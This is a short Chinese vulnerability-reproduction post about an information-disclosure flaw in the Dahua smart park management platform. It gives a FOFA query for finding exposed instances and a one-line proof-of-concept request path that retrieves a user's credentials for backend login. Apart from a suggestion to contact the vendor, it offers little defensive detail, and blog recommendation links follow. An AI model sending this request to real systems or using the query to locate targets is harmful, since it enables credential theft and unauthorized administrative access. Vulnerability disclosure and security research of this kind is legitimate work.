【漏洞复现】大华智慧园区综合管理平台信息泄露漏洞

Nx01 产品简介

大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

Nx02 漏洞描述

大华智慧园区综合管理平台存在信息泄露漏洞,攻击者通过此漏洞获取用户名及密码进行后台登陆。

Nx03 产品主页

fofa-query: app.name="Dahua 大华 智慧园区管理平台"

Nx04 漏洞复现

POC:

复制代码
/admin/user_getUserInfoByUserName.action?userName=system

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
liebe1*19 分钟前
第七章 防火墙地址转换
运维·服务器·网络
好好学操作系统15 分钟前
autodl 保存 数据 跨区
linux·运维·服务器
KingRumn17 分钟前
Linux同步机制之信号量
linux·服务器·网络
嵌入式学习菌18 分钟前
SPIFFS文件系统
服务器·物联网
旺仔Sec18 分钟前
2026年度河北省职业院校技能竞赛“Web技术”(高职组)赛项竞赛任务
运维·服务器·前端
BullSmall39 分钟前
linux 根据端口查看进程
linux·运维·服务器
herinspace43 分钟前
管家婆软件年结存后快马商城操作注意事项
服务器·数据库·windows
嘻哈baby1 小时前
DDNS动态域名解析方案对比与实战配置
网络
Hard but lovely1 小时前
linux:----进程守护化(Daemon)&&会话的原理
linux·运维·服务器
捷米研发三部1 小时前
Profinet转ModbusTCP网关:实现西门子1200PLC与打标卡稳定通讯
网络